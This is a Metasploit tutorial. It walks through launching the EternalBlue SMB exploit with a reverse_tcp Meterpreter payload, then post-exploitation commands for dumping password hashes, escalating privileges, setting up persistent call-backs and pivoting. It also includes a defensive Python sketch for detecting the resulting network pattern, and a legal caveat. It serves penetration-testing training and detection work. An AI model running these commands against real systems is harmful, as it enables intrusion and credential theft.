Getting Started with Metasploit
The Metasploit Framework is the world's most used penetration testing software. This tutorial walks you through everything from installation to your first exploit.
Architecture Overview
Metasploit's modular architecture consists of:
- Exploits: Code that takes advantage of vulnerabilities
- Payloads: Code that runs after exploitation (shells, Meterpreter)
- Auxiliaries: Scanning, fuzzing, and information gathering modules
- Post-Exploitation: Modules for privilege escalation, persistence, pivoting
- Encoders: Obfuscation to evade detection
Basic Workflow
Start Metasploit console:
msfconsole

Search for exploits:
msf6 > search type:exploit platform:windows smb

Select an exploit:
msf6 > use exploit/windows/smb/ms17_010_eternalblue

Show options:
msf6 exploit(ms17_010_eternalblue) > show options

Set target and payload:
msf6 > set RHOSTS 192.168.1.100
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.50

Execute:
msf6 > exploit
Meterpreter Post-Exploitation
Once you have a Meterpreter session:
System information:
meterpreter > sysinfo

Dump password hashes:
meterpreter > hashdump

Screenshot:
meterpreter > screenshot

Privilege escalation:
meterpreter > getsystem

Persistence:
meterpreter > run persistence -U -i 10 -p 4444 -r 192.168.1.50

Pivoting:
meterpreter > run autoroute -s 10.0.0.0/24
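
Seen from the defender's side, the lab workflow above leaves a recognizable network pattern: inbound SMB (port 445) to the target, a reverse_tcp call-back from the target to LHOST, and, with the persistence command shown, reconnection attempts to 192.168.1.50 on port 4444 at a 10-second interval. The following Python detection sketch is an added example, not part of the original tutorial; the flow-log format, the port allow-list and the thresholds are assumptions, and the sample records are constructed.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed flow records: epoch_seconds src_ip dst_ip dst_port (format is an assumption)
SAMPLE_FLOWS = """\
1000 192.168.1.50 192.168.1.100 445
1004 192.168.1.100 192.168.1.50 4444
1014 192.168.1.100 192.168.1.50 4444
1024 192.168.1.100 192.168.1.50 4444
1034 192.168.1.100 192.168.1.50 4444
1005 192.168.1.100 192.168.1.10 53
1100 192.168.1.20 192.168.1.30 445
1130 192.168.1.30 192.168.1.5 443
"""

COMMON_PORTS = {53, 80, 123, 443, 445}  # assumed allow-list of expected destination ports
WINDOW = 60       # seconds after inbound SMB in which a call-back is suspicious
MIN_BEACONS = 3   # connections needed before judging regularity
MAX_JITTER = 1.0  # max std-dev (seconds) of the gaps to call the traffic a beacon

def parse(text):
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or not (parts[0].isdigit() and parts[3].isdigit()):
            continue  # skip malformed records
        ts, src, dst, port = parts
        yield int(ts), src, dst, int(port)

def find_findings(text):
    flows = sorted(parse(text))   # time order, so per-key timestamp lists are sorted
    smb_in = {}                   # (smb_server, smb_client) -> time of first inbound SMB
    outbound = defaultdict(list)  # (src, dst, port) -> timestamps on unusual ports
    for ts, src, dst, port in flows:
        if port == 445:
            smb_in.setdefault((dst, src), ts)
        elif port not in COMMON_PORTS:
            outbound[(src, dst, port)].append(ts)
    findings = []
    for (src, dst, port), times in outbound.items():
        smb_ts = smb_in.get((src, dst))  # did this peer reach us over SMB first?
        callback = smb_ts is not None and 0 <= times[0] - smb_ts <= WINDOW
        gaps = [b - a for a, b in zip(times, times[1:])]
        beacon = len(times) >= MIN_BEACONS and pstdev(gaps) <= MAX_JITTER
        if callback or beacon:
            findings.append({"host": src, "peer": dst, "port": port,
                             "callback_after_smb": callback,
                             "beacon_interval": mean(gaps) if beacon else None})
    return findings
```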
Important: Legal & Ethical Considerations
Always ensure you have written authorization before testing. Unauthorized access to computer systems is illegal. Use dedicated lab environments or authorized bug bounty programs.
Conclusion
Metasploit is an incredibly powerful framework. Master it in a controlled lab environment before using it in production assessments.